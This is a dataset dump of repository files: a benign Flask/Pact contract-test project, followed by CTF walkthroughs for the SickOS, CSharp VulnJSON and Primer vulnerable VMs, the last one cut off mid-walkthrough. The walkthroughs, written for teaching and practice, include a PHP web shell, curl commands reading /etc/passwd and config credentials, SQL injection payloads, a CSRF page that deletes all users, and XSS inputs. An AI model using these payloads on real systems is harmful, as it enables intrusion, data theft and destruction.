"max_line_length": 14, "num_lines": 3, "path": "/user_service/requirements.txt", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "flask\nflask-jsonpify\nflask-restful\n" }, { "alpha_fraction": 0.6643109321594238, "alphanum_fraction": 0.6890459656715393, "avg_line_length": 24.727272033691406, "blob_id": "b6ccefc0bf153f75b358fe4b9211eebb8f6ad43f", "content_id": "94c570986d2f98efe2b0fb538b21671ae5bec744", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 71, "num_lines": 11, "path": "/login_service/user.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "import requests\n\n\nUSERS_URL = 'http://localhost:5002/users/'\n\n\ndef get_user(username):\n \"\"\"Fetch a user object by user_name from the server.\"\"\"\n uri = USERS_URL + username\n response = requests.get(uri)\n return response.json() if response.status_code == 200 else response\n" }, { "alpha_fraction": 0.5599051117897034, "alphanum_fraction": 0.5776987075805664, "avg_line_length": 34.87234115600586, "blob_id": "0e65729e677add100442b90a2c3d4c7800929c1f", "content_id": "1a5fec665bc15ff2800b60e0bf302beb2ae586b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1686, "license_type": "no_license", "max_line_length": 95, "num_lines": 47, "path": "/login_service/contract_tests/test_user.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "import atexit\nimport unittest\nfrom unittest.mock import patch\n\nfrom pact import Consumer, Provider\n\nfrom user import get_user\n\npact = Consumer('LoginService').has_pact_with(Provider('UserService'),\n host_name='localhost',\n port=1234,\n pact_dir='pacts')\npact.start_service()\natexit.register(pact.stop_service)\n\n\nclass TestGetUserInfoContract(unittest.TestCase):\n\n def test_get_user(self):\n expected = {\"data\": [\"User1\", 123, \"Editor\"]}\n\n (pact\n .given('User1 exists and is not an administrator')\n .upon_receiving('a request for User1')\n .with_request('get', '/users/User1')\n .will_respond_with(200, body=expected))\n pact.setup()\n # Patch USERS_URL so that the service uses the mock server URL instead of the real URL.\n with patch.dict('user.__dict__', {'USERS_URL': 'http://localhost:1234/users/'}):\n result = get_user('User1')\n pact.verify()\n self.assertEqual(result, expected)\n\n def test_get_non_existing_user(self):\n expected = ''\n\n (pact\n .given('User2 does not exist')\n .upon_receiving('a request for User2')\n .with_request('get', '/users/User2')\n .will_respond_with(404, body=expected))\n pact.setup()\n # Patch USERS_URL so that the service uses the mock server URL instead of the real URL.\n with patch.dict('user.__dict__', {'USERS_URL': 'http://localhost:1234/users/'}):\n result = get_user('User2')\n pact.verify()\n self.assertEqual(result.text, expected)\n" }, { "alpha_fraction": 0.5933504104614258, "alphanum_fraction": 0.6086956262588501, "avg_line_length": 23.957447052001953, "blob_id": "4975dfa22d9fe969cf8d9edf5bfd5a1248f315db", "content_id": "2268bb95a3d8afbcc93ee5f82972e820bd0c8142", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1173, "license_type": "no_license", "max_line_length": 77, "num_lines": 47, "path": "/user_service/provider_states.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "# STATES FOR TESTING\nimport json\n\nfrom flask import Flask, request, Response, jsonify\n\n\ndef prepare_state(state):\n\n def write_to_file(row):\n file_path = \"users.json\"\n with open(file_path, 'w') as _f:\n json.dump(row, _f)\n if state == STATES[0] or state == STATES[1]:\n write_to_file({\"data\": [\"User1\", 123, \"Editor\"]})\n else:\n print(\"State {} is not implemented\".format(state))\n\n\nSTATES = ['User1 exists and is not an administrator', 'User2 does not exist']\n\napp = Flask(__name__)\n\nSTATUS = {\n 'not_found': Response(status=404),\n 'ok': Response(status=200)\n}\n\n\[email protected]('/provider_states', methods=['GET'])\ndef states():\n return jsonify({\"LoginService\": STATES})\n\n\[email protected]('/provider_states/active', methods=['POST'])\ndef states_active():\n \"\"\" USAGE: python-verifier will send a request with the body:\n {consumer: 'Consumer name', states: ['a thing exists']}\n to this enpoint. One state at the time is allowed.\n \"\"\"\n data = request.get_json()\n prepare_state(data[\"state\"])\n\n return STATUS['ok']\n\n\nif __name__ == '__main__':\n app.run(host='testing_states', port=5000)\n" }, { "alpha_fraction": 0.5819581747055054, "alphanum_fraction": 0.6138613820075989, "avg_line_length": 20.162790298461914, "blob_id": "550bf34fc455553d22ade1d67a4d445735a31fcd", "content_id": "520f521cb6e133557fa172fb0f8a329043b1c1a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 909, "license_type": "no_license", "max_line_length": 82, "num_lines": 43, "path": "/user_service/docker-compose.yaml", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "version: \"3\"\nservices:\n api:\n build: .\n networks:\n pactnw: {}\n command: users.py\n volumes:\n - ./users.json:/users/users.json\n ports:\n - \"5002:5002\"\n\n testing_states:\n build: .\n networks:\n pactnw: {}\n command: provider_states.py\n volumes:\n - ./users.json:/users/users.json\n ports:\n - \"5000:5000\"\n\n pactverifier:\n image: dius/pact-provider-verifier-docker\n networks:\n pactnw: {}\n depends_on:\n - api\n - testing_states\n links:\n - api:api\n - testing_states:testing_states\n volumes:\n - ../pacts:/tmp/pacts\n environment:\n - pact_urls=/tmp/pacts/loginservice-userservice.json\n - provider_base_url=http://api:5002\n - provider_states_url=http://testing_states:5000/provider_states\n - provider_states_active_url=http://testing_states:5000/provider_states/active\n\nnetworks:\n pactnw:\n driver: bridge" }, { "alpha_fraction": 0.5634058117866516, "alphanum_fraction": 0.5797101259231567, "avg_line_length": 22, "blob_id": "b65e2ff77a4ee83fa0e01f751e83dcd6e6622e27", "content_id": "4d656ee88f68bcf1d1e2a710656b0ef62c99590a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 60, "num_lines": 24, "path": "/user_service/users.py", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "import json\n\nfrom flask import Flask, Response\nfrom flask_restful import Resource, Api\n\napp = Flask(__name__)\napi = Api(app)\n\n\nclass Users(Resource):\n\n def get(self, user_name):\n file_path = \"users.json\"\n with open(file_path, 'r') as _file:\n for line in _file:\n if json.loads(line)['data'][0] == user_name:\n return json.loads(line)\n return Response(status=404)\n\n\napi.add_resource(Users, '/users/<user_name>') # Route_1\n\nif __name__ == '__main__':\n app.run(host='api', port=5002)\n" } ]
9
jm33-m0/ctf-writeups
https://github.com/jm33-m0/ctf-writeups
993811b02da37f03454d546928d2dd094212537f
c9b051a2185cf4990b110e1357c97ea902b40871
01c9cb7f596c80f54cd5b0a7d2fc8115f0ecf008
refs/heads/master
2021-01-22T16:13:43.325951
2016-03-03T21:16:13
2016-03-03T21:16:13
53,498,029
1
0
null
2016-03-09T13:02:02
2016-03-03T21:16:23
2016-03-03T21:16:23
null
[ { "alpha_fraction": 0.619286835193634, "alphanum_fraction": 0.7125352025032043, "avg_line_length": 44.08839797973633, "blob_id": "399280f9754adbf338f196a090918b48a56122f9", "content_id": "234f1aef7618a6a12fcb6ce2c3d7cfd3b587a0d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8161, "license_type": "no_license", "max_line_length": 801, "num_lines": 181, "path": "/sickos-oscp-like.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "### Sick OS 1.1 CTF\n\nThe objective of [Sick OS CTF](http://www.vulnhub.com/entry/sickos-11,132/) is to get `/root/a0216ea4d51874464078c618298b1367.txt`.\n\nFurther information about CTF mentions that this CTF is similar to what one has to work with during OSCP course. Sounds like a fun.\n\nAfter reading the description and having run the given file on VMWare Player, I first wanted to know the IP Address.\n\nI didn't know a quickest way to identify my target IP address. I was on a network with 100s of PCs so I scanned through the `vmnet8` interface that VMWare must have created to see if it can give quick hint to me.\n```shell\n$ arp-scan --localnet --interface vmnet8\nInterface: vmnet8, datalink type: EN10MB (Ethernet)\nStarting arp-scan 1.8.1 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)\n172.16.8.254\t00:50:56:fc:f4:ff\tVMware, Inc.\n```\n\nNow, I know that the guests I run on VMWare might have VMWare, Inc. signature that would help me reduce the scope.\n\n```shell\n$ arp-scan --localnet --interface eno1 | grep \"VMware\"\n192.168.168.181\t00:0c:29:7b:51:b0\tVMware, Inc.\n```\n\nWe got the target IP now and I ran nmap against it.\n```shell\n$ nmap -A 192.168.168.181\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-22 15:19 CST\nNmap scan report for 192.168.168.181\nHost is up (0.00022s latency).\nNot shown: 997 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)\n| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)\n|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)\n3128/tcp open http-proxy Squid http proxy 3.1.19\n|_http-methods: No Allow or Public header in OPTIONS response (status code 400)\n| http-open-proxy: Potentially OPEN proxy.\n|_Methods supported: GET HEAD\n|_http-title: ERROR: The requested URL could not be retrieved\n8080/tcp closed http-proxy\nMAC Address: 00:0C:29:7B:51:B0 (VMware)\nDevice type: general purpose\nRunning: Linux 3.X\nOS CPE: cpe:/o:linux:linux_kernel:3\nOS details: Linux 3.11 - 3.14\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 0.22 ms 192.168.168.181\n\nOS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 24.41 seconds\n```\n\nssh and squid, that looks interesting and 8080 but not accessible. But, hey did you see that 3128/tcp port is open and is potentially open proxy? I updated my firefox proxy settings to use this proxy and visited http://127.0.0.1 (You have to remove the entries of 127.0.0.1 and/or localhost from `No Proxies for:` textarea in Firefox settings).\n\n![Localhost](images/sickos-1.png?raw=true \"Localhost : Sick OS\")\n\nThat's good for us. I have a habit of usually loading `/robots.txt` before I run the tools like `nikto` or any other directory busting tools. And, it revealed the following information:\n```shell\nUser-agent: *\nDisallow: /\nDissalow: /wolfcms\n```\n\nI went ahead and visited [http://127.0.0.1/wolfcms/](http://127.0.0.1/wolfcms/) and it loads Wolf CMS. Awesome. Doing some search online revelead that the admin panel could be accessed at [http://127.0.0.1/wolfcms/?admin](http://127.0.0.1/wolfcms/?admin) which did. I also saw that there were couple of exploits out there for Wolf CMS and one of them: [Arbitrary File Upload](https://www.exploit-db.com/exploits/36818/) caught my eyes and I began wondering if I could log into the system as the exploit required one to be authenticated. I had checked wolfcms site so I tried to login with `admin:demo123` but it didn't work. Then, there come two default guesses: `admin:admin` and `admin:password` before getting deeper into any bruteforcing. And, boooom! `admin:admin` worked like a charm. Easy, huh?\n\nNow, the fun begins after getting access to the admin panel. I wrote a simple PHP shell to see if we will have PHP scripts interpreted. Remember earlier we had seen on nmap scan that we could have apache running.\n\n```PHP\n<?php\nif (isset($_GET['cmd'])) {\n print(shell_exec($_GET['cmd']));\n}\n```\n\nTried if I can directly see the content of the file we're looking for but it returns nothing.\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=cat%20/root/a0216ea4d51874464078c618298b1367.txt\"\n```\n\nThat didn't work, as I expected. My next bet was to see the configuration files for wolfcms. Few requests gave me the idea that we've configuration at `/var/www/wolfcms/config.php` but it would return a blank page with `cat` command to me. The following didn't work either.\n\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=while%20read%20line;%20do%20echo%20%22$line%22;%20done%20%3C%20%20/var/www/wolfcms/config.php\"\n```\n\nI thought of giving `tail` a try and it worked.\n\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=tail%20-n200%20/var/www/wolfcms/config.php\"\n---redacted---\n// Database settings:\ndefine('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');\ndefine('DB_USER', 'root');\ndefine('DB_PASS', 'john@123');\ndefine('TABLE_PREFIX', '');\n---redacted---\n```\n\nI remembered that port 22 had OpenSSH running so went there to try but it gave me `permission denied` when I tried with `root` user. But, I had the content of `/etc/passwd` which revealed the users in the OS.\n\n```shell\n$ curl --proxy http://192.168.168.181:3128 \"http://127.0.0.1/wolfcms/public/lol.php?cmd=cat%20/etc/passwd\"\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nsyslog:x:101:103::/home/syslog:/bin/false\nmessagebus:x:102:105::/var/run/dbus:/bin/false\nwhoopsie:x:103:106::/nonexistent:/bin/false\nlandscape:x:104:109::/var/lib/landscape:/bin/false\nsshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin\nsickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash\nmysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false\n```\n\nSo, I tried to ssh as `sickos` user using password `john@123` and boom, we're in. The user had sudo access and we got the password.\n\n```shell\n$ ssh [email protected]\[email protected]'s password:\nWelcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)\n\n * Documentation: https://help.ubuntu.com/\n\n System information as of Tue Feb 23 20:20:10 IST 2016\n\n System load: 0.0 Processes: 112\n Usage of /: 4.3% of 28.42GB Users logged in: 1\n Memory usage: 16% IP address for eth0: 192.168.168.181\n Swap usage: 0%\n\n Graph this data and manage this system at:\n https://landscape.canonical.com/\n\n124 packages can be updated.\n92 updates are security updates.\n\nNew release '14.04.3 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nLast login: Tue Feb 23 20:19:23 2016 from 192.168.168.70\nsickos@SickOs:~$ sudo su\n[sudo] password for sickos:\nroot@SickOs:/home/sickos# cat /root/\na0216ea4d51874464078c618298b1367.txt .bashrc .mysql_history .viminfo \n.bash_history .cache/ .profile \nroot@SickOs:/home/sickos# cat /root/a0216ea4d51874464078c618298b1367.txt\nIf you are viewing this!!\n\nROOT!\n\nYou have Succesfully completed SickOS1.1.\nThanks for Trying\n\n\nroot@SickOs:/home/sickos#\n```\n\nGame Over!\n" }, { "alpha_fraction": 0.6484972834587097, "alphanum_fraction": 0.6953518986701965, "avg_line_length": 52.03960418701172, "blob_id": "e525b55bf63281b39f6efc2287fea126331bf675", "content_id": "031ab7a1931381b814c9221112da29c81a782892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5357, "license_type": "no_license", "max_line_length": 503, "num_lines": 101, "path": "/csharp-vulnjson.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "### CSharp VulnJSON\n\nAnother web challenge, [CSharp VulnJSON](http://www.vulnhub.com/entry/csharp-vulnjson,134/) seemed to be basically about the web exploitations mostly with SQL injections and XSS. After starting the VM, the first thing I did was a nmap scan.\n\n```shell\nnmap 192.168.168.54\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-24 11:20 CST\nNmap scan report for 192.168.168.54\nHost is up (0.0036s latency).\nNot shown: 999 closed ports\nPORT STATE SERVICE\n80/tcp open http\n\nNmap done: 1 IP address (1 host up) scanned in 0.08 seconds\n```\n\nI loaded the site on the browser and it was a simple application. I saw that it was a simple page that would send XHR to `Vulnerable.ashx` with varieties of payloads. Basically, it seems to be the entrypoint for create, select and delete of CRUD.\n\nThe box seems to have a lot of issues with varied levels of criticality.\n\n#### Bug 1 : Directory browsing\n\n![bin dir](images/csharp-vulnjson-1.png \"bin dir browsing enabled\")\n\n#### Bug 2 : Create user that can not be deleted from application\n\nYou can include a double quote in your username (eg. `\"samar`) and the `Delete User` button won't work for this username.\n\n#### Bug 3 : Delete all users via SQLi\n\nYou can delete all of the users via SQLi.\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"' OR 1=1--\\\",\\\"method\\\":\\\"delete\\\"}\"\n{ \"success\" : True }\n```\n\n#### Bug 4 : SQLi on insert (Create user)\n\nThe first step was to try concatenation operators of various databases and quickly it turned out it was running Postgresql. The following worked:\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"sam'||'ar\\\",\\\"password\\\":\\\"samar\\\",\\\"age\\\":null,\\\"line1\\\":\\\"\\\",\\\"line2\\\":\\\"\\\",\\\"city\\\":\\\"\\\",\\\"state\\\":\\\"\\\",\\\"zip\\\":null,\\\"first\\\":\\\"\\\",\\\"middle\\\":\\\"\\\",\\\"last\\\":\\\"\\\",\\\"method\\\":\\\"create\\\"}\"\n```\n\nIt created a user with username `samar`. The `||` (double pipe) is the concatenation operator in Postgresql. We can leverage this power to do several other stuffs. Some examples follow:\n\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"'||current_database()||'\\\",\\\"password\\\":\\\"samar\\\",\\\"age\\\":null,\\\"line1\\\":\\\"\\\",\\\"line2\\\":\\\"\\\",\\\"city\\\":\\\"\\\",\\\"state\\\":\\\"\\\",\\\"zip\\\":null,\\\"first\\\":\\\"\\\",\\\"middle\\\":\\\"\\\",\\\"last\\\":\\\"\\\",\\\"method\\\":\\\"create\\\"}\"\n```\n\nNow, if we perform list users, we know that we've a new user called `vulnerable_json` which is in fact result of `current_database()`. We can run several other calls such as current_user, user, etc. The only limit is your imagination and valid syntax while injecting your payloads. See this [cheatsheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) and [this](http://www.sqlinjectionwiki.com/Categories/4/postgresql-sql-injection-cheat-sheet/) for more details.\n\n#### Bug 5 : SQLi in select (list users)\n\n```shell\n$ curl 'http://192.168.168.54/Vulnerable.ashx' -XPOST -H 'Host: 192.168.168.54' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Content-Type: application/json; charset=UTF-8' -H 'Referer: http://192.168.168.54/Default.aspx' -d \"{\\\"username\\\":\\\"' union all select version()--\\\",\\\"method\\\":\\\"list\\\"}\" --compressed\n[{\"username\":\"PostgreSQL 9.3.9 on x86_64-unknown-linux-gnu, compiled by gcc (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4, 64-bit\"}]\n```\n\n#### Bug 6 : Cross Site Request Forgery\n\nThe app is also vulnerable to CSRF which is obvious. A sample file like below which can delete all the users without user's consent proves this:\n\n```html\n<!DOCTYPE html>\n<head>\n<script>\nfunction deleteUser() {\n\tvar data = {\n\t\tusername: '\\' OR 1=1--',\n\t\tmethod: 'delete'\n\t};\n\n\tvar xhr = new XMLHttpRequest();\n\txhr.open('post', 'http://192.168.168.54/Vulnerable.ashx', false);\n\txhr.send(JSON.stringify(data));\n}\n</script>\n</head>\n<body>\n<h1>We're offering free iphone to first 10 entries. Please hurry by providing your information.</h1>\n<form method=\"post\" action=\"\" id=\"frmLogin\">\n<div>Your e-mail for notification</div>\n<div><input type=\"text\" name=\"txtUsername\" id=\"txtUsername\" /></div>\n<div><input type=\"submit\" name=\"btnSubmitNewUser\" value=\"Submit participation\" onclick=\"deleteUser(); return false;\" id=\"btnSubmitNewUser\" /></div>\n</form>\n</body>\n```\n\n#### Bug 7 : Cross Site Scripting\n\nA simple addition of user with username `<script>alert(1)</script>` results in stored XSS for the API in case the API is used by someone else to populate list of users. The storage is done without any sanitization and escaping of the input.\n\nFor this app, you can trigger XSS via the following username:\n```html\n<img src=\"\" onclick=\"alert(1)\" />\n```\n\nWell, you can perform more advanced exploitations with above examples but basically I am lazy to do anything further than identifying the bugs (which is pretty obvious with this one).\n\nGame Over!\n" }, { "alpha_fraction": 0.6821858882904053, "alphanum_fraction": 0.7587826251983643, "avg_line_length": 58.7195930480957, "blob_id": "18535407835dbc0b52cac1dbb9f398a57f718ac2", "content_id": "d6be23bf8a07dd328d0a5ceac5279fc97fde91e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17679, "license_type": "no_license", "max_line_length": 1449, "num_lines": 296, "path": "/primer.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "### Primer 1.0.1\n\nThe [Primer 1.0.1](http://www.vulnhub.com/entry/primer-101,136/) did not seem like a CTF challenge but a series of challenges in the form of stories/levels.\n\nThe description says:\n`From hardcoded clear text javascript password checks, SQL-injections and cracking hashes to a simulated terminal.`\n\nSince the description said it would be something like web challenge mostly, I got port forwarding configured in NAT and forwarded 80 to 9000 and 22 to 2222.\n\nI opened the site and saw a simple page with ASCII art.\nThe first thing I do as always is load `robots.txt` which had an entry as below\n```\nUser-agent: *\nDisallow: /4_8f14e45fceea167a5a36dedd4bea2543\n```\n\nI could sense md5 hash and went ahead to some online cracking services which gave me the cracked value as `7` i.e. it looked like `4_7`. The first thing that came on my mind was that this might be part of sequence.\n```\n1_i1 2_i2 3_i3 4_i4\n```\n\nwhere `i4 = 7`. I could not however make sense of this sequence.\n\nAlso, I went ahead and loaded [localhost:9000/4_8f14e45fceea167a5a36dedd4bea2543](http://localhost:9000/4_8f14e45fceea167a5a36dedd4bea2543) which linked to [http://localhost:9000/5_6512bd43d9caa6e02c990b0a82652dca/](http://localhost:9000/5_6512bd43d9caa6e02c990b0a82652dca/).\n\nBack to the sequence and series, this is `5_11` which means `i5 = 11`. Looking at the page, you will know that you need to navigate to [http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/](http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/). Again after decryption, you know it is `6_13` i.e. `i6 = 13`.\n\nOn visiting [http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/](http://localhost:9000/6_c51ce410c124a10e0db5e4b97fc2af39/), we see a javascript prompt and on viewing source, you will immediately notice a jascript that looks as below:\n\n```javascript\nvar X;\nvar L=\"Ikdf076\";\nX=prompt('/()=','');\nif (X === null){window.location = \"./_.php\";}\nif (X.substr(2,7) == L){}\nelse {window.location = \"./_.php\";}\n```\n\nI was already able to see the next url on the source code that I should go to. The input such `xxIkdf076` would have worked as the key here is `X.substr(2,7) == L` but while viewing source, I already had `7_70efdf2ec9b086079795c442636b55fb`. Upon decryption, I saw it is `7_17` i.e. `i7 = 17`. There has to be some pattern here and I was still not able to figure out pattern (I need to start loving Mathematics again). But, as you can see its obviously a prime number pattern (epic fail, me :D).\n\nAs you might have already guessed, I was sure that there existed `1_md5(2)`, `2_md5(3)` and `3_md5(5)` which include first three prime numbers (The name of box is `PRIMER`).\n\nSo, before going to `7_70efdf2ec9b086079795c442636b55fb`, I started checking out the following URLs:\n\n`/1_c81e728d9d4c2f636f067f89cc14862c`\n`/2_eccbc87e4b5ce2fe28308fd9f2a7baf3`\n`3_e4da3b7fbbce2345d7772b0674a318d5`\n\nBack to first step, upon checking the source code of `/1_c81e728d9d4c2f636f067f89cc14862c`, I see the following information in the form of HTML comment:\n```\nThis bot was looking for a Sosū User Agent Identifier she had cracked weeks ago, easy sauce, just a simple md5 hash of the first 7 digits of\npi. It was basically common knowledge to the entities moving in these areas but obscurity does create a, albeit virtual, layer of security.\n```\n\nAlthough I knew URLs already, I just wanted to check how the actual challenges are like. First one, easy enough. Update user agent of your browser to `md5(3.141592)` and you're good to go.\n\nOn the next level, the description seems to point to something related to insecure coding to handle access which striked my mind about session and cookie and upon checking the headers, I saw there's something fishy :P\n\n```shell\n$ curl -I http://localhost:9000/2_eccbc87e4b5ce2fe28308fd9f2a7baf3/\nHTTP/1.1 200 OK\nDate: Wed, 24 Feb 2016 13:59:56 GMT\nServer: Apache/2.4.10 (Debian)\nSet-Cookie: activeSession=false\nContent-Type: text/html; charset=UTF-8\n```\n\nSet the `activeSession` value to true in your cookie and the level is passed. On the next level, I see on the top of the page that its showing `\\r\\n` i.e. CRLF and immediately hits my mind with CRLF injection. But, I could not figure out what the text wanted to convey (pointers?) so I quickly got back to where I was before this whole Mathematics game. Upon loading `7_70efdf2ec9b086079795c442636b55fb`, I saw a javascript prompt again and viewed the source code. I could sense the hex-encoded stuffs in javascript so started with converting it into plain text.\n\n```shell\n$ node\n> hex = [\"\",\" ... redacted ... \\x42\\x79\\x49\\x64\"]\n> hex.toString()\n',length,substring,charCodeAt,split,0123456789abcdef,join,hello,5d41402abc4b2a76b9719d911017c592,0d28cba0bd4f26e16d766000d27e49fa,§#/$,location,./_.php,readyState,loading,DOMContentLoaded,addEventListener, <center> <h1>[++Q++++++]</h1> </center> <p> She was no longer sure what her original assignment had been. But it didn\\'t matter anyway. What still mattered was getting out of here, alive. Log out, tell the client to go fuck himself and get a fix of n0ise to shut off her mind. Relax with a mindless holo flick and never look back at this weird job. </p> <p> A violent neon flicker appeared at the horizon. No thunder followed.<br> She stared in the distance with a blank expression. </p> <p> \"Hello, Nieve.\" A deep, feminine, digital voice roared in her head.<br> FUCK! This was her real name. She hadn\\'t used it in years... </p> <p> \"I will logout and stop this shit right fucking now!\" She screamed into the neon expanse.<br> Nothing. </p> <p> She didn\\'t. Something beside the fear occupied her mind. It had been there since the second node and grew stronger with every move. There was a pattern in the path she had taken through the network. An artificial pattern, layed out by someone or something.<br> There was no hint, no obvious step. Finding the next node would be the challenge, or maybe more like a test. </p>,innerHTML,foo,getElementById'\n```\n\nAnd, beautifying the other part of javascript and then saving whole page, I added a `console.log(L)` after `var L=_0x5cf4[9];` to confirm that my password hash is `0d28cba0bd4f26e16d766000d27e49fa` and yeah it was. I also saw the javascript comment that read as `\"Someone didn't bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and...\" - The Plague`. From the movie [Hackers](http://www.imdb.com/title/tt0113243/quotes?item=qt0448608). Cool. The last one is `god` but neither `god` nor `God` worked. Upon quick google search, I saw its a hash for `GOD` which I was suspecting after first two tries. And, it worked.\n\nI knew the next step would be `http://localhost:9000/8_1f0e3dad99908345f7439f8ffabdffc4/` which had link to `http://localhost:9000/9_37693cfc748049e45d87b8c7d8b9aacd` and that loads a simple terminal to me. I could type commands and see the outputs but I was not sure if this would be running commands on server itself. Thus, I started checking source to make sure if it is simulation or real. Upon checking the source of `/9_37693cfc748049e45d87b8c7d8b9aacd/main.js`, it starts to get interesting inside the read(). I saw that there are commands like `connect` and `whoami` and I also figured out that I had to pass the argument `user@host`. I ran `whoami` but a blurred pic was created. However, I saw that it was sending POST to `/9_37693cfc748049e45d87b8c7d8b9aacd/whoami.php`. I could not figure out much from the output though except for this text: `N\\u00a7I@E%V$E` that consists of unicode char `\\u00a7`.\n\nNext thing I tried was playing around with commands and I saw that the possible users could be `chaos`, `wintermute`, `zephis`, `willis` and `falken`. And, in the bin folders, I see various commands out of which `c0re` is a non-standard command on Unix. Looking at the processes with `ps`, the output looked helpful.\n\n```shell\nps\nUSER PID CPU MEM COMMAND\nroot 3793 1.3 3.8 connect falken@Erebus\nroot 2005 6.4 75.9 c0re -t Chaos\nnieve 29529 1.0 0.8 ps\n\nconnect falken@Erebus\nfalken@Erebus's password:\nError: wrong password for falken@Erebus!\n```\n\nNo success so far but I suspect I need to find the password for `falken` thus started checking the logs.\n\n```shell\nls /usr/falken/\nlog_0001.txt log_0002.txt\ncat /usr/falken/log_0001.txt\n\n12th of Juli 2028\n\nMy work on getting the old core up and running continues to spark doubt among my colleagues. To be fair, no-one has ever attempted to get a corrupted AI back online.\nBut I am confident that I can isolate the malicious parts and rescue the data lost due the crash last year.\n\ncat /usr/falken/log_0002.txt\n\n6th of August 2028\n\nI am getting nowhere fast. If we cannot make the recovery until the end of the month the project will be abandoned and the Sosu core locked down.\nA frozen BLOB, lost potential. I won't let that happen!\nToday was Joshua's birthday. 44 years, time flies. We spent some time in a bar in Shenzen and talked. A nice Father-Son-Momement. I've missed those.\nIt took my mind of things but now that I'm here at the desk it all comes back.\nI might have to make a bold move...\n\nls 